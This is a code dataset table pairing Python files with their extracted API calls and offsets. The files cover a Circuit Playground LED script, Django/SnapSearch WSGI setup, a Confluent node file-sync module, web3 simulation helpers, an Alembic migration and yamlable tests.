code (stringlengths 22–1.05M) | apis (sequencelengths 1–3.31k) | extract_api (stringlengths 75–3.25M) |
---|---|---|
from adafruit_circuitplayground.express import cpx
# Main loop gets x, y and z axis acceleration, prints the values, and turns on
# red, green and blue, at levels related to the x, y and z values.
while True:
if cpx.switch:
print("Slide switch off!")
cpx.pixels.fill((0, 0, 0))
continue
else:
R = 0
G = 0
B = 0
x, y, z = cpx.acceleration
print((x, y, z))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R, G, B))
| [
"adafruit_circuitplayground.express.cpx.pixels.fill"
] | [((272, 298), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (287, 298), False, 'from adafruit_circuitplayground.express import cpx\n'), ((574, 600), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(R, G, B)'], {}), '((R, G, B))\n', (589, 600), False, 'from adafruit_circuitplayground.express import cpx\n')] |
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings")
# django WSGI application
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# load SnapSearch API credentials
api_email = "<email>"
api_key = "<key>"
# initialize the interceptor
from SnapSearch import Client, Detector, Interceptor
interceptor = Interceptor(Client(api_email, api_key), Detector())
# deploy the interceptor
from SnapSearch.wsgi import InterceptorMiddleware
application = InterceptorMiddleware(application, interceptor)
| [
"os.environ.setdefault",
"django.core.wsgi.get_wsgi_application",
"SnapSearch.wsgi.InterceptorMiddleware",
"SnapSearch.Client",
"SnapSearch.Detector"
] | [((11, 82), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""hello_world.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'hello_world.settings')\n", (32, 82), False, 'import os\n'), ((174, 196), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (194, 196), False, 'from django.core.wsgi import get_wsgi_application\n'), ((511, 558), 'SnapSearch.wsgi.InterceptorMiddleware', 'InterceptorMiddleware', (['application', 'interceptor'], {}), '(application, interceptor)\n', (532, 558), False, 'from SnapSearch.wsgi import InterceptorMiddleware\n'), ((381, 407), 'SnapSearch.Client', 'Client', (['api_email', 'api_key'], {}), '(api_email, api_key)\n', (387, 407), False, 'from SnapSearch import Client, Detector, Interceptor\n'), ((409, 419), 'SnapSearch.Detector', 'Detector', ([], {}), '()\n', (417, 419), False, 'from SnapSearch import Client, Detector, Interceptor\n')] |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2021 Lenovo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import tempfile
import confluent.sshutil as sshutil
import confluent.util as util
import confluent.noderange as noderange
import eventlet
import pwd
import grp
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != 17:
raise
def get_entries(filename):
secname = 'REPLACE:'
filename = filename.strip()
if filename[-1] == '>':
filename = filename[:-1]
with open(filename, 'r') as slfile:
slist = slfile.read()
entries = slist.split('\n')
for ent in entries:
ent = ent.split('#', 1)[0].strip()
if not ent:
continue
if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'):
secname = ent
if ent[0] == '<':
subfilename = ent[1:]
if subfilename[-1] == '>':
subfilename = subfilename[:-1]
if subfilename[0] != '/':
subfilename = os.path.join(os.path.dirname(filename), subfilename)
for subent in get_entries(subfilename):
yield subent
yield secname
else:
yield ent
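# Illustrative syncfile that get_entries()/SyncList below would parse (an assumed
# example, not from the source; the paths, node range and owner/group are made up):
#
#   /etc/hosts -> /etc/hosts
#   /etc/motd -> n1-n4:/etc/motd (owner=root,group=root)
#   <extra.synclist>
#   MERGE:
#   /etc/group -> /etc/group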
class SyncList(object):
def __init__(self, filename, nodename, cfg):
slist = None
self.replacemap = {}
self.appendmap = {}
self.appendoncemap = {}
self.mergemap = {}
self.optmap = {}
entries = get_entries(filename)
currmap = self.replacemap
for ent in entries:
try:
cmtidx = ent.index('#')
ent = ent[:cmtidx]
except ValueError:
pass
for special in '$%^&|{}':
if special in ent:
raise Exception(
'Special character "{}" reserved for future use'.format(special))
ent = ent.strip()
if not ent:
continue
if ent[-1] == ':':
if ent == 'MERGE:':
currmap = self.mergemap
elif ent == 'APPENDONCE:':
currmap = self.appendoncemap
elif ent == 'REPLACE:':
currmap = self.replacemap
else:
raise Exception(
'Section "{}" is not currently supported in syncfiles'.format(ent[:-1]))
continue
if '->' in ent:
k, v = ent.split('->')
k = k.strip()
v = v.strip()
if ':' in v:
nr, v = v.split(':', 1)
for candidate in noderange.NodeRange(nr, cfg).nodes:
if candidate == nodename:
break
else:
continue
optparts = v.split()
v = optparts[0]
optparts = optparts[1:]
else:
kparts = []
optparts = []
currparts = kparts
for part in ent.split():
if part[0] == '(':
currparts = optparts
currparts.append(part)
k = ' '.join(kparts)
v = None
entopts = {}
if optparts:
if optparts[0][0] != '(' or optparts[-1][-1] != ')':
raise Exception("Unsupported syntax in syncfile: " + ent)
opts = ','.join(optparts)
opts = opts[1:-1]
for opt in opts.split(','):
optname, optval = opt.split('=')
if optname == 'owner':
try:
uid = pwd.getpwnam(optval).pw_uid
except KeyError:
uid = None
optval = {'name': optval, 'id': uid}
elif optname == 'group':
try:
gid = grp.getgrnam(optval).gr_gid
except KeyError:
gid = None
optval = {'name': optval, 'id': gid}
entopts[optname] = optval
currmap[k] = v
targ = v if v else k
for f in targ.split():
self.optmap[f] = entopts
def sync_list_to_node(sl, node, suffixes):
targdir = tempfile.mkdtemp('.syncto{}'.format(node))
output = ''
try:
for ent in sl.replacemap:
stage_ent(sl.replacemap, ent, targdir)
if 'append' in suffixes:
while suffixes['append'] and suffixes['append'][0] == '/':
suffixes['append'] = suffixes['append'][1:]
for ent in sl.appendmap:
stage_ent(sl.appendmap, ent,
os.path.join(targdir, suffixes['append']))
if 'merge' in suffixes:
while suffixes['merge'] and suffixes['merge'][0] == '/':
suffixes['merge'] = suffixes['merge'][1:]
for ent in sl.mergemap:
stage_ent(sl.mergemap, ent,
os.path.join(targdir, suffixes['merge']), True)
if 'appendonce' in suffixes:
while suffixes['appendonce'] and suffixes['appendonce'][0] == '/':
suffixes['appendonce'] = suffixes['appendonce'][1:]
for ent in sl.appendoncemap:
stage_ent(sl.appendoncemap, ent,
os.path.join(targdir, suffixes['appendonce']), True)
sshutil.prep_ssh_key('/etc/confluent/ssh/automation')
output = util.run(
['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0]
except Exception as e:
if 'CalledProcessError' not in repr(e):
# https://github.com/eventlet/eventlet/issues/413
# for some reason, can't catch the calledprocesserror normally
# for this exception, implement a hack workaround
raise
unreadablefiles = []
for root, dirnames, filenames in os.walk(targdir):
for filename in filenames:
filename = os.path.join(root, filename)
try:
with open(filename, 'r') as _:
pass
except OSError as e:
unreadablefiles.append(filename.replace(targdir, ''))
if unreadablefiles:
raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles))
else:
raise
finally:
shutil.rmtree(targdir)
if not isinstance(output, str):
output = output.decode('utf8')
retval = {
'options': sl.optmap,
'output': output,
}
return retval # need dictionary with output and options
def stage_ent(currmap, ent, targdir, appendexist=False):
dst = currmap[ent]
everyfent = []
allfents = ent.split()
for tmpent in allfents:
fents = glob.glob(tmpent)
everyfent.extend(fents)
if not everyfent:
raise Exception('No matching files for "{}"'.format(ent))
if dst is None: # this is to indicate source and destination as one
dst = os.path.dirname(everyfent[0]) + '/'
while dst and dst[0] == '/':
dst = dst[1:]
if len(everyfent) > 1 and dst[-1] != '/':
raise Exception(
'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst))
fulltarg = os.path.join(targdir, dst)
for targ in everyfent:
mkpathorlink(targ, fulltarg, appendexist)
def mkpathorlink(source, destination, appendexist=False):
if os.path.isdir(source):
mkdirp(destination)
for ent in os.listdir(source):
currsrc = os.path.join(source, ent)
currdst = os.path.join(destination, ent)
mkpathorlink(currsrc, currdst)
else:
if destination[-1] == '/':
mkdirp(destination)
destination = os.path.join(destination, os.path.basename(source))
else:
mkdirp(os.path.dirname(destination))
if appendexist and os.path.exists(destination):
tmpnam = tempfile.mktemp()
shutil.copy(destination, tmpnam)
os.remove(destination)
with open(destination, 'w') as realdest:
with open(tmpnam) as olddest:
realdest.write(olddest.read())
with open(source) as sourcedata:
realdest.write(sourcedata.read())
os.remove(tmpnam)
else:
os.symlink(source, destination)
syncrunners = {}
def start_syncfiles(nodename, cfg, suffixes):
deployinfo = cfg.get_node_attributes(
nodename, ('deployment.*',))
deployinfo = deployinfo.get(nodename, {})
profile = deployinfo.get(
'deployment.pendingprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.stagedprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.profile', {}).get('value', '')
if not profile:
raise Exception('Cannot perform syncfiles without profile assigned')
synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile)
if not os.path.exists(synclist):
return '200 OK' # not running
sl = SyncList(synclist, nodename, cfg)
if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap):
return '200 OK' # the synclist has no actual entries
syncrunners[nodename] = eventlet.spawn(
sync_list_to_node, sl, nodename, suffixes)
return '202 Queued' # backgrounded
def get_syncresult(nodename):
if nodename not in syncrunners:
return ('204 Not Running', '')
if not syncrunners[nodename].dead:
return ('200 OK', '')
result = syncrunners[nodename].wait()
del syncrunners[nodename]
return ('200 OK', result)
| [
"os.walk",
"os.remove",
"os.path.exists",
"os.listdir",
"pwd.getpwnam",
"os.path.isdir",
"glob.glob",
"confluent.sshutil.prep_ssh_key",
"os.path.dirname",
"shutil.copy",
"confluent.noderange.NodeRange",
"grp.getgrnam",
"os.makedirs",
"eventlet.spawn",
"os.path.join",
"os.symlink",
"tempfile.mktemp",
"os.path.basename",
"shutil.rmtree"
] | [((8126, 8152), 'os.path.join', 'os.path.join', (['targdir', 'dst'], {}), '(targdir, dst)\n', (8138, 8152), False, 'import os\n'), ((8296, 8317), 'os.path.isdir', 'os.path.isdir', (['source'], {}), '(source)\n', (8309, 8317), False, 'import os\n'), ((10220, 10277), 'eventlet.spawn', 'eventlet.spawn', (['sync_list_to_node', 'sl', 'nodename', 'suffixes'], {}), '(sync_list_to_node, sl, nodename, suffixes)\n', (10234, 10277), False, 'import eventlet\n'), ((848, 865), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (859, 865), False, 'import os\n'), ((6186, 6239), 'confluent.sshutil.prep_ssh_key', 'sshutil.prep_ssh_key', (['"""/etc/confluent/ssh/automation"""'], {}), "('/etc/confluent/ssh/automation')\n", (6206, 6239), True, 'import confluent.sshutil as sshutil\n'), ((7211, 7233), 'shutil.rmtree', 'shutil.rmtree', (['targdir'], {}), '(targdir)\n', (7224, 7233), False, 'import shutil\n'), ((7617, 7634), 'glob.glob', 'glob.glob', (['tmpent'], {}), '(tmpent)\n', (7626, 7634), False, 'import glob\n'), ((8366, 8384), 'os.listdir', 'os.listdir', (['source'], {}), '(source)\n', (8376, 8384), False, 'import os\n'), ((9943, 9967), 'os.path.exists', 'os.path.exists', (['synclist'], {}), '(synclist)\n', (9957, 9967), False, 'import os\n'), ((6705, 6721), 'os.walk', 'os.walk', (['targdir'], {}), '(targdir)\n', (6712, 6721), False, 'import os\n'), ((7842, 7871), 'os.path.dirname', 'os.path.dirname', (['everyfent[0]'], {}), '(everyfent[0])\n', (7857, 7871), False, 'import os\n'), ((8408, 8433), 'os.path.join', 'os.path.join', (['source', 'ent'], {}), '(source, ent)\n', (8420, 8433), False, 'import os\n'), ((8456, 8486), 'os.path.join', 'os.path.join', (['destination', 'ent'], {}), '(destination, ent)\n', (8468, 8486), False, 'import os\n'), ((8775, 8802), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (8789, 8802), False, 'import os\n'), ((8825, 8842), 'tempfile.mktemp', 'tempfile.mktemp', ([], {}), '()\n', (8840, 8842), False, 'import tempfile\n'), ((8855, 8887), 'shutil.copy', 'shutil.copy', (['destination', 'tmpnam'], {}), '(destination, tmpnam)\n', (8866, 8887), False, 'import shutil\n'), ((8900, 8922), 'os.remove', 'os.remove', (['destination'], {}), '(destination)\n', (8909, 8922), False, 'import os\n'), ((9188, 9205), 'os.remove', 'os.remove', (['tmpnam'], {}), '(tmpnam)\n', (9197, 9205), False, 'import os\n'), ((9232, 9263), 'os.symlink', 'os.symlink', (['source', 'destination'], {}), '(source, destination)\n', (9242, 9263), False, 'import os\n'), ((8659, 8683), 'os.path.basename', 'os.path.basename', (['source'], {}), '(source)\n', (8675, 8683), False, 'import os\n'), ((8718, 8746), 'os.path.dirname', 'os.path.dirname', (['destination'], {}), '(destination)\n', (8733, 8746), False, 'import os\n'), ((1601, 1626), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1616, 1626), False, 'import os\n'), ((5469, 5510), 'os.path.join', 'os.path.join', (['targdir', "suffixes['append']"], {}), "(targdir, suffixes['append'])\n", (5481, 5510), False, 'import os\n'), ((5777, 5817), 'os.path.join', 'os.path.join', (['targdir', "suffixes['merge']"], {}), "(targdir, suffixes['merge'])\n", (5789, 5817), False, 'import os\n'), ((6125, 6170), 'os.path.join', 'os.path.join', (['targdir', "suffixes['appendonce']"], {}), "(targdir, suffixes['appendonce'])\n", (6137, 6170), False, 'import os\n'), ((6789, 6817), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (6801, 6817), False, 'import os\n'), ((3252, 3280), 
'confluent.noderange.NodeRange', 'noderange.NodeRange', (['nr', 'cfg'], {}), '(nr, cfg)\n', (3271, 3280), True, 'import confluent.noderange as noderange\n'), ((4357, 4377), 'pwd.getpwnam', 'pwd.getpwnam', (['optval'], {}), '(optval)\n', (4369, 4377), False, 'import pwd\n'), ((4634, 4654), 'grp.getgrnam', 'grp.getgrnam', (['optval'], {}), '(optval)\n', (4646, 4654), False, 'import grp\n')] |
import json
import os
from argparse import ArgumentTypeError
from eth_typing import Address
from web3.contract import Contract
from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR
async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool:
statuses = [True]
try:
if status_init:
for c in contracts:
# Use different cloud_addresses for each contract instance
cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation()
c.set_cloud_sla_address(cloud_address)
statuses.append(cloud_status_ok)
if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file':
statuses.append(await c.upload())
if fn == 'file_check_undeleted_file':
statuses.append(await c.read())
if fn == 'corrupted_file_check':
statuses.append(await c.another_file_upload_read())
if fn == 'delete':
for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1):
statuses.append(await c.upload())
else:
for c in contracts:
if fn == 'delete':
if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1:
for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))):
statuses.append(await c.upload())
except ValueError as v:
print(f'{type(v)} [init_sim]: {v}')
else:
return check_statuses(statuses)
def get_credentials(blockchain: str) -> tuple:
if blockchain == 'polygon':
from settings import (
polygon_private_keys
)
return polygon_private_keys
from settings import (
quorum_private_keys
)
return quorum_private_keys
def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract:
def get_abi(path: str) -> list:
with open(path) as file:
contract_json = json.load(file)
contract_abi = contract_json['abi']
return contract_abi
abi = get_abi(compiled_contract_path)
contract = w3.eth.contract(address=address, abi=abi)
return contract
def check_statuses(statuses: []) -> bool:
for idx in range(len(statuses)):
if statuses[idx] == 0:
return False
return True
def exists_mkdir(paths: []):
for path in paths:
if not os.path.exists(path):
os.mkdir(path)
def get_contracts_config(blockchain: str, msg: bool = True):
if msg:
print('Retrieve config file...')
filename = f'{blockchain}.json'
filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename)
with open(filepath) as file:
contracts_summary = json.loads(file.read())
if msg:
print(f'Config file retrieved at {filepath}.')
return contracts_summary
def range_limited_val(arg: str) -> int:
"""
Type function for argparse - int within some predefined bounds.
"""
try:
s = int(arg)
except ValueError:
raise ArgumentTypeError("must be a int number")
if s < MIN_VAL or s > MAX_VAL:
raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}")
return s
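# Hedged usage sketch for range_limited_val as an argparse type; the parser and the
# flag name are hypothetical, only MIN_VAL comes from this module's imports:
#
#   import argparse
#   parser = argparse.ArgumentParser()
#   parser.add_argument('-t', '--transactions', type=range_limited_val, default=MIN_VAL)
#   args = parser.parse_args()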
| [
"os.path.exists",
"argparse.ArgumentTypeError",
"os.getcwd",
"os.mkdir",
"json.load"
] | [((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((2125, 2140), 'json.load', 'json.load', (['file'], {}), '(file)\n', (2134, 2140), False, 'import json\n'), ((2560, 2580), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2574, 2580), False, 'import os\n'), ((2594, 2608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2602, 2608), False, 'import os\n'), ((3198, 3239), 'argparse.ArgumentTypeError', 'ArgumentTypeError', (['"""must be a int number"""'], {}), "('must be a int number')\n", (3215, 3239), False, 'from argparse import ArgumentTypeError\n')] |
"""add topics
Revision ID: 816ea3631582
Revises: <KEY>
Create Date: 2021-03-13 14:20:10.044131
"""
from alembic import op
import sqlalchemy as sa
import bot
# revision identifiers, used by Alembic.
revision = "816ea3631582"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"topics",
sa.Column("content", sa.Text(), nullable=False),
sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True),
sa.PrimaryKeyConstraint("content"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("topics")
# ### end Alembic commands ###
| [
"alembic.op.drop_table",
"sqlalchemy.PrimaryKeyConstraint",
"bot.database.TIMESTAMP",
"sqlalchemy.Text"
] | [((735, 758), 'alembic.op.drop_table', 'op.drop_table', (['"""topics"""'], {}), "('topics')\n", (748, 758), False, 'from alembic import op\n'), ((569, 603), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""content"""'], {}), "('content')\n", (592, 603), True, 'import sqlalchemy as sa\n'), ((442, 451), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (449, 451), True, 'import sqlalchemy as sa\n'), ((506, 543), 'bot.database.TIMESTAMP', 'bot.database.TIMESTAMP', ([], {'timezone': '(True)'}), '(timezone=True)\n', (528, 543), False, 'import bot\n')] |
from copy import copy
try:
# Python 2 only:
from StringIO import StringIO
# create a variant that can serve as a context manager
class StringIO(StringIO):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
except ImportError:
from io import StringIO
try: # python 3.5+
from typing import Dict, Any
from yamlable import Y
except ImportError:
pass
import pytest
from yaml import dump, load
from yamlable import YamlAble, yaml_info
def test_yamlable_incomplete_description():
""" Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """
with pytest.raises(NotImplementedError) as err_info:
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo'
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo()
# dump
f.dumps_yaml()
assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value)
def test_yamlable():
""" Tests that YamlAble works correctly """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.Foo
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == Foo.loads_yaml(y)
# load io
assert f == Foo.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
def test_yamlable_legacy_method_names():
""" Tests that YamlAbleMixIn works correctly """
global enc
global dec
enc, dec = False, False
@yaml_info(yaml_tag_ns='yaml.tests')
class FooLegacy(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def to_yaml_dict(self):
# type: (...) -> Dict[str, Any]
global enc
enc = True
return copy(vars(self))
@classmethod
def from_yaml_dict(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
global dec
dec = True
return FooLegacy(**dct)
# instantiate
f = FooLegacy(1, 'hello')
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooLegacy
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooLegacy.loads_yaml(y)
# load io
assert f == FooLegacy.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
assert enc
assert dec
# TODO override so that tag is not supported, to check error message
def test_yamlable_not_supported():
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Err(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo_Err(**dct)
@classmethod
def is_yaml_tag_supported(cls,
yaml_tag # type: str
):
# type: (...) -> bool
# ALWAYS return false
return False
with pytest.raises(TypeError) as err_info:
Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n")
assert "No YamlAble subclass found able to decode object" in str(err_info.value)
def test_yamlable_default_impl():
""" tests that the default implementation works """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Default(YamlAble):
def __init__(self, a, b):
self.a = a
self.b = b
f = Foo_Default(1, 'hello')
s = """!yamlable/yaml.tests.Foo_Default
a: 1
b: hello
"""
assert dump(f, default_flow_style=False) == s
assert dump(load(dump(load(s))), default_flow_style=False) == s
def test_help_yaml_info():
@yaml_info("com.example.MyFoo")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo"
@yaml_info(yaml_tag_ns="com.example")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.Foo"
assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {}
"""
def test_abstract_parent_error():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooE(YamlAble):
pass
class FooError(AbstractFooE):
"""
This class inherits from the parent without redefining a yaml tag
"""
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
e = FooError(1, 'hello')
# dump
with pytest.raises(NotImplementedError):
e.dumps_yaml()
def test_abstract_parent():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooV(YamlAble):
pass
@yaml_info(yaml_tag_ns='yaml.tests')
class FooValid(AbstractFooV):
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
f = FooValid(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooValid
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooValid.loads_yaml(y)
# load io
assert f == FooValid.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
| [
"yaml.dump",
"yaml.load",
"pytest.raises",
"io.StringIO.close",
"io.StringIO",
"yamlable.yaml_info"
] | [((1534, 1569), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (1543, 1569), False, 'from yamlable import YamlAble, yaml_info\n'), ((3261, 3296), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (3270, 3296), False, 'from yamlable import YamlAble, yaml_info\n'), ((5081, 5116), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (5090, 5116), False, 'from yamlable import YamlAble, yaml_info\n'), ((6338, 6373), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (6347, 6373), False, 'from yamlable import YamlAble, yaml_info\n'), ((6736, 6766), 'yamlable.yaml_info', 'yaml_info', (['"""com.example.MyFoo"""'], {}), "('com.example.MyFoo')\n", (6745, 6766), False, 'from yamlable import YamlAble, yaml_info\n'), ((6870, 6906), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""com.example"""'}), "(yaml_tag_ns='com.example')\n", (6879, 6906), False, 'from yamlable import YamlAble, yaml_info\n'), ((7876, 7911), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (7885, 7911), False, 'from yamlable import YamlAble, yaml_info\n'), ((721, 755), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (734, 755), False, 'import pytest\n'), ((2914, 2947), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (2918, 2947), False, 'from yaml import dump, load\n'), ((3092, 3099), 'yaml.load', 'load', (['y'], {}), '(y)\n', (3096, 3099), False, 'from yaml import dump, load\n'), ((4740, 4773), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (4744, 4773), False, 'from yaml import dump, load\n'), ((4930, 4937), 'yaml.load', 'load', (['y'], {}), '(y)\n', (4934, 4937), False, 'from yaml import dump, load\n'), ((6038, 6062), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6051, 6062), False, 'import pytest\n'), ((6593, 6626), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (6597, 6626), False, 'from yaml import dump, load\n'), ((7625, 7659), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (7638, 7659), False, 'import pytest\n'), ((8805, 8838), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (8809, 8838), False, 'from yaml import dump, load\n'), ((8993, 9000), 'yaml.load', 'load', (['y'], {}), '(y)\n', (8997, 9000), False, 'from yaml import dump, load\n'), ((2764, 2784), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (2778, 2784), False, 'from io import StringIO\n'), ((3044, 3055), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (3052, 3055), False, 'from io import StringIO\n'), ((4590, 4610), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (4604, 4610), False, 'from io import StringIO\n'), ((4882, 4893), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (4890, 4893), False, 'from io import StringIO\n'), ((8655, 8675), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (8669, 8675), False, 'from io import StringIO\n'), ((8945, 8956), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (8953, 8956), False, 'from io import StringIO\n'), ((6659, 6666), 
